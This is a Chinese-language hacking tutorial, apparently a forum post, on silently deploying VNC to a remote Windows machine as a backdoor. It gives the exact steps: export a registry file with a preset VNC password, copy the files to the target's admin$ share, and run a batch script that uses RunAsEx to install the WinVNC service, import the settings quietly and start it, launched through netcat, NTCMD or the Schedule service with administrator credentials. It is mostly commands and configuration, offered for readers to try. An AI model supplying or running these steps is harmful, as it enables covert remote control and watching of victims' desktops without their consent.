VNC是AT&T公司的远程管理软件,和终端服务类似,和终端不同的地方在于终端服务连接上去是开启了一个会话,而VNC则是和当前正在登录的用户共用同一个会话。这也就是说,你可以和当前登录的用户同时操作,他所作的一切你都可以看见,反之亦然。
VNC并没有提供远程安装的功能,经过一个下午的摸索,我终于找到了远程安装的方法。
1、首先在自己的系统上安装VNC,并且将VNC安装为服务(在装完VNC后,菜单中提供一项功能可以直接在本机装为服务)。
2、服务启动以后,会在任务栏出现一个小图标,这个时候必须设置一个密码(否则VNC不允许远程连接)。这个密码同时也是将来我们安装到远程时候的密码。
3、使用注册表工具将VNC在本机的设置导出。
regedit /e HKEY_CURRENT_USER\software\ORL vnc1.reg
regedit /e HKEY_LOCAL_MACHINE\software\ORL vnc2.reg
4、将vnc1.reg和vnc2.reg合并为一个文件vnc.reg(怎么合并就不用说了吧C&P)。
这时候的vnc.reg文件看起来应该是这样的(具体系统会有所不同)
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\software\ORL]
[HKEY_CURRENT_USER\software\ORL\WinVNC3]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"Password"=hex:fd,9d,5b,8d,77,f7,ea,8d
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000001
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
[HKEY_LOCAL_MACHINE\software\ORL]
[HKEY_LOCAL_MACHINE\software\ORL\WinVNC3]
[HKEY_LOCAL_MACHINE\software\ORL\WinVNC3\default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"Password"=hex:fd,9d,5b,8d,77,f7,ea,8d
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000001
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
[\HKEY_USERS\.DEFAULT\Software\ORL]
[\HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"Password"=hex:fd,9d,5b,8d,77,f7,ea,8d
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000001
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
5、将需要远程安装的文件复制到同一个目录下面。
Msvcirt.dll
Msvcrt.dll
omnithread_rt.dll
RegDll.exe
vnc.reg
VNCHooks.dll
6、将vnc.reg和RunAsEx.exe(www.netXeyes.com)复制到这个目录下。
7、为了安装方便写一个BAT文件reg.bat,也放到这个目录下,这个文件的内容如下:
runasex %1 %2 winvnc.exe "-install"
runasex %1 %2 regedit.exe "/s \winnt\vnc.reg"
net start winvnc
这时候,所有需要的文件都已经准备完成了,如下所列:
Msvcirt.dll
Msvcrt.dll
omnithread_rt.dll
reg.bat
RegDll.exe
RunAsEx.exe
vnc.reg
VNCHooks.dll
8、将文件复制到远程主机(需要Administrators组的权限)。
copy *.* \\xxx.xxx.xxx.xxx\admin$
9、利用NTCMD或者NC或者Schedule服务一类的东西在远程主机中执行如下命令。
reg.bat <用户名> <密码>
用户名和密码就是远程系统具有Administrators权限的用户名和密码。
10、利用vnc_viewer连接。
另:我这篇文章写的很简单,在实际中可能会遇到这样或者那样的问题。自己实践过的东西才是自己的,这也是我没有写的非常详细的原因。
自己动手实践是一种乐趣,Good Luck!
